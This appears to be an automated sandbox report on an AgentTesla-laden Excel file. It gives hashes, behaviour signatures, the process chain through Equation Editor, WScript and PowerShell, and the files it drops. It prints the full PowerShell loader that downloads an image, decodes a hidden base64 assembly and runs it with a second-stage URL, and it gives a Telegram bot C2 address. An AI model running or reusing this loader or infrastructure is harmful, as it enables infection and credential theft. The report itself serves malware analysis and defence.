Analysis

  • max time kernel
    149s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23/04/2024, 05:49

General

  • Target

    gmb.xls

  • Size

    317KB

  • MD5

    37d7ed40a42e26fbc230b8ba27f5e7a7

  • SHA1

    e1bbcb647ab9a9997d5efcc1c9dccb0d6ae44fd2

  • SHA256

    65fad97c98ab775a18d96e3ddbfd291500d23f856bde32bdab3fb2417560dacc

  • SHA512

    3be9673b330b95c7c52d1328f50443821852f8e0471014338b066bbbedef302da7eaa7601d09ef507dd7e9d67ef7d8fd166f4e0c40b0f93942e46328237acfc3

  • SSDEEP

    6144:EVunJE2uY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVYjMIrSdsLks3Azpt6Tf:E4JE2n3bVYjMIrSkkt86KWriT

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot6957776389:AAGE3Y2I0YZ27F-41ZLwjxi6zM96chGzSyw/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 6 IoCs
  • Abuses OpenXML format to download file from external location
  • Drops startup file 2 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\gmb.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2292
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:540
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IBnetworkPDFlovedone.js"
        2⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:1844
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BMG/bmg/ppmax/212.84.631.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado'))}}
          3⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1496
          • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1444

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

      Filesize

      1KB

      MD5

      ad5aefd69c456466e97a0aa256aaaa4f

      SHA1

      2c4e9fd8897a0c4f78cf3610334cb24a51ec18cd

      SHA256

      73ae9fec50a02b16ba846791482d056e0e1364f346d9bc2168c6836b4abec210

      SHA512

      f3be0bc26313215477431b6ed242990195e343608858ddfa398a05e99d033eefaa5f66bd4fb6a4e04ad6453062c87c8e49b92698c2a44f5145844597a9ca5a40

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

      Filesize

      724B

      MD5

      8202a1cd02e7d69597995cabbe881a12

      SHA1

      8858d9d934b7aa9330ee73de6c476acf19929ff6

      SHA256

      58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

      SHA512

      97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

      Filesize

      410B

      MD5

      7706ba9b1ebe15d40214be083027d500

      SHA1

      75f345cdda41a7dd2618f77cfc0682044b4b5b7b

      SHA256

      1e0676049323027a9fcadf3e3233a2a288ab20fbdb1b537577693eb3a2d8a76d

      SHA512

      dae9e5d02f296e7a424f2d19cdbc2fc36288e31c920771c0af0abacede44c4a6f6834606c93ab885a3e5cd6db47f06f82677d28ea2be288f7a2168bcce45af65

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      196396100a013ed1fb09635a66d4e510

      SHA1

      4f6cb601b1567e2d7537717d29659cdc7f55b057

      SHA256

      7f10c85fe470982f6d4dfe34b598d06912eb76bb0309965b91a637629b24e3e2

      SHA512

      02e76335bcf7d06211b7ec5e8409ba38a6ece33bcb4715bf16e4755ce85d262072285e7e81f9d0fb74431fa1866847a2ee23923057eb5807016ebd109189e3e7

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      e6761f29eb657d098d4c4c107b00ad7c

      SHA1

      7eef7a8d1bcf3c9801694649ffd37451b3dde9f6

      SHA256

      c8d7ffee653c6169f38d275f60046a86ea62a052e97f946a412ad4fa08c2ec75

      SHA512

      16abf5ab7fda173858216eca97cb8b8f5f0bfb53c8e94c9e745e4491347c179d254322d9935916e18d76c1b7a41abaa0676bf630714fbc8d44a5fefc4838fe5a

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

      Filesize

      392B

      MD5

      2c3cd964d3177c44e90019cb36f59b1d

      SHA1

      0ab6ace78bc3476d1d02d20771ee14ff28fc0065

      SHA256

      f536a4470495e665425dc6224d197e117a61230dd012c0590f013255d4dc02e8

      SHA512

      72fde2fbffd7219a1d987d3a03d753e24b1e5a0544c3a13e00f8a6f5eb8da59c351b62375c275a159cd655e77b813174a99a0bae281f7f7b213acf82d0409e31

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{1F10983A-2207-4EE2-A7C4-24C059AE1D2A}.FSD

      Filesize

      128KB

      MD5

      e19b66af174c9be451c15c4156834063

      SHA1

      723c721783ac4156f43e58550bfd1bb9a56c73de

      SHA256

      05e0b78858312ccb1888de2fe154a6eaf94e4a5cc5dbccd757db86915f383bc6

      SHA512

      8b226bd716856a4ebad66d9538171967a7c8eac59d600ef073b44034b86101debd7224294ec4185e664b7e465a0d4cb7b4cb3d2f00f7771fde3b731d0379c019

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      d096c81c7dc37c24898d44c4247484be

      SHA1

      688fb16f4a41307cfa88a66faa3e12bc28017eb6

      SHA256

      9d213c94232f87d8223f7eea12d609c71d6e262b81227d296ae6a46613f0aec5

      SHA512

      55a0de4b5f57226b00885579797e3df3b2fd4bde46e6864e95f2e79c13a06ea0601e2960d38ad070620b6a2c272c99c9792f545b9f162d59d6142e92a625abdf

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{826381C9-ED08-45C6-9662-177F69FB159E}.FSD

      Filesize

      128KB

      MD5

      bb1be817c8e75e6c3602a1e201057716

      SHA1

      98174b464b6efcc9a15db2abefec8eac1dab6ede

      SHA256

      23a837754a1116523512165c31fd46be1b6a6d79169b5ebbd2cceb070486c9de

      SHA512

      5ec2fe4fd6f24874a3886871030619937ea9693253ac6b3fb20629ed0c55b7f5cf5c7172c204f527ad690f561c6f2f0d33b6fed759a5654a3a5160928ebe66a4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\mereallylovedhewithentirethingswhichmakeuunderstandhowmuchilovedherwithallmyheartbecausesheismy__girlwhoilovedtrulyfromtheheart[1].doc

      Filesize

      68KB

      MD5

      7a1d6c5ef0b63d38df276c570b23412f

      SHA1

      7dc88b0d1889f550f008b74fa7e543b1364b4523

      SHA256

      5272e9bd0cf7a0c6067b5480d1e49bb993ced502cbd430fe65b53ef9dd14c2bd

      SHA512

      5e25a28d033c0b8bbb3901c5c071529af4b5ddd438df30ab0928654de896884ca9b0a81f4ad462a212c5366627fc5ff3a7d142562d459165960d5f15de2e8ee2

    • C:\Users\Admin\AppData\Local\Temp\Cab2ECF.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar31DB.tmp

      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\Tar3961.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Local\Temp\{3792AD43-589B-45F1-ADC8-7BEC176ACFC1}

      Filesize

      128KB

      MD5

      4f187c56668909958327473817c34a6c

      SHA1

      b07e68df711e362990797e626c48b13a5cf24eae

      SHA256

      9947ab7927558aa76be7efb83b3211a5bd11eeab9e0e1bd98c3d61f36e6dc1b1

      SHA512

      6c7823a282b333a73be15d16b4011b8c1a34993418ca248430fb36d38417730a67701a875e38371b36b7fbc269d626f0a9f2e75be08bf860deae490446783dbd

    • C:\Users\Admin\AppData\Roaming\IBnetworkPDFlovedone.js

      Filesize

      6KB

      MD5

      12840b5cb7f892aec8043a02716673c0

      SHA1

      62c677902733d04407cb9f5c5572df426f4925ea

      SHA256

      e9f030d3f0f819f787b16921935ae011cbd0514da40f12fa3fb96381d97021ce

      SHA512

      dc83eb1a984902976ed4f049510d862174a9cad81da969996435162973274b7fab53b60c6991a4dcbf889c56e60eb8b2a268c658aa040ead1dadbf3b610e895e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\72K16KHJ.txt

      Filesize

      831B

      MD5

      7b5fac415d4e2b1c7260c000c904c582

      SHA1

      d44bffe78f7d451ad5931fe4bc9bff7787cb8e92

      SHA256

      183ad745ad3ff7ee5973d4c408a17e8db1b0d3c698ce2a553520993745f8e933

      SHA512

      d1dd9faf0870cbc890ed8ba2e2b79584b6cbbbf83ecf71dc6f346fdb4dfec1950755194cb16688ab870ba80d011267fe64ad82e4e481374b87684d5cb3d4a874

    • memory/1444-227-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1444-225-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1444-213-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1444-215-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1444-217-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1444-219-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1444-221-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/1444-223-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1496-143-0x0000000069EE0000-0x000000006A48B000-memory.dmp

      Filesize

      5.7MB

    • memory/1496-145-0x0000000069EE0000-0x000000006A48B000-memory.dmp

      Filesize

      5.7MB

    • memory/1496-144-0x0000000002F60000-0x0000000002FA0000-memory.dmp

      Filesize

      256KB

    • memory/1496-228-0x0000000069EE0000-0x000000006A48B000-memory.dmp

      Filesize

      5.7MB

    • memory/1844-139-0x0000000005240000-0x0000000005280000-memory.dmp

      Filesize

      256KB

    • memory/1844-140-0x0000000069F50000-0x000000006A4FB000-memory.dmp

      Filesize

      5.7MB

    • memory/1844-138-0x0000000069F50000-0x000000006A4FB000-memory.dmp

      Filesize

      5.7MB

    • memory/1844-230-0x0000000069F50000-0x000000006A4FB000-memory.dmp

      Filesize

      5.7MB

    • memory/2292-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2292-212-0x000000007254D000-0x0000000072558000-memory.dmp

      Filesize

      44KB

    • memory/2292-1-0x000000007254D000-0x0000000072558000-memory.dmp

      Filesize

      44KB

    • memory/2292-28-0x00000000023C0000-0x00000000023C2000-memory.dmp

      Filesize

      8KB

    • memory/2680-23-0x000000002F271000-0x000000002F272000-memory.dmp

      Filesize

      4KB

    • memory/2680-25-0x000000007254D000-0x0000000072558000-memory.dmp

      Filesize

      44KB

    • memory/2680-27-0x0000000002580000-0x0000000002582000-memory.dmp

      Filesize

      8KB

    • memory/2680-229-0x000000007254D000-0x0000000072558000-memory.dmp

      Filesize

      44KB